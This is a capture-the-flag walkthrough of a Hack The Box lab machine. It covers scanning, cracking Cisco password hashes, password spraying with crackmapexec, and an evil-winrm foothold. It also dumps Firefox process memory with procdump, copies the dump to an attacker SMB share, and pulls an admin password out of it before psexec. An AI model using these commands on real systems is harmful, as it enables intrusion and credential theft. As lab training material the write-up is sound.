Again, we start with nmap -sC -sV -oA ./heist 10.10.10.149
We have HTTP and SMB. Let's start with the web page. It looks like a simple Login.
It looks like we can log in as Guest. When we do, we are given what looks like a Technical Support conversation.
The initiating comment of the conversation has an attachment that contains:
OK. Tangent time. I have actually seen people do this IRL and the fact that they are in IT terrifies me to no end. That attachment contains all of the router/switch administrator passwords!!!! NEVER put something like that on any kind of public forum. That's just........I seriously have no words. Hazard should be cleaning out his desk right about now.
OK.....I'm better now. So, there are DOZENS of sites dedicated to cracking Cisco passwords. For example, https://www.ifm.net.nz/cookbooks/passwordcracker.html takes that type 7 admin password "hash" of 02375012182C1A1D751618034F36415408 and cracks it into "Q4)sJu\Y8qz*A3?d" in less than a second. It takes 0242114B0E143F015F5D1E161713 and turns it into "$uperP@ssword". However, the type 5 one requires a little bit of John cracking. I drop the hash into a "type5" file and set John to work with:
So, to recap, we have the following credentials already:
Looking at the Issues page, we can also guess that Hazard is another username we can use. I'm going to use every variation of admin, administrator, support admin, etc. as well. So, we have 9 usernames and 3 passwords.
We are setting up for a sort of password spray attack. I've dropped these users and passwords into seperate txt files.
Now, we can run CrackMapExec and spray those users with those passwords.
crackmapexec smb 10.10.10.149 ./users.txt -p ./pass.txt
Lo and behold! Our old buddy Hazard reused the type 5 stealth1agent password. I try smbclient, but that was an enormous fail. Hazard has no access, which is probably a good thing. Let's try WinRM. Nope Another fail. RID Brute forceing??
Finally! Something worked. We now have a few more usernames to try. So, I change the users.txt with those new usernames (drop the old ones) of:
Use the same password spray we did before and we find Chase's password. At least his looks randomized XD Evil-WinRM gets us our initial foothold
evil-winrm -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
We type out the todo.txt file in Chase's Desktop folder and we see that his #1 item is to constantly check that issues page. Running Get-Process shows that he is using Firefox to check that site. Let's see if we can dump the memory of those Firefox processes in case they have goodies. To do that, we need the smbserver.py script again.
On Attacking Machine one level up from the procdump64.exe file:
sudo python3 /impacket/examples/smbserver.py -smb2support -username guest -password guest share ProcDump
net use x: \\10.10.14.28\share /user:guest guest
cp x:\procdump64.exe ./procdump.exe
.\procdump.exe -ma 6184 firefox.dmp
cp .\firefox.dmp x:\firefox.dmp
If we intercept a login request to the page, we see that login_username and login_password are the variables that the page is looking for to authenticate. So, we can use "strings" to search the dmp file for login_password and we get this response.
"C:\Program Files\Mozilla Firefox\firefox.exe" firstname.lastname@example.org&login_password=4dD!5}x/re8]FBuZ&login=
Now, we can try to evil-winrm as admin! aaaannnnddd EPIC fail XD
Let's try psexec instead. Awesome! That one worked. Grab your flags and grab a beer! Celebration time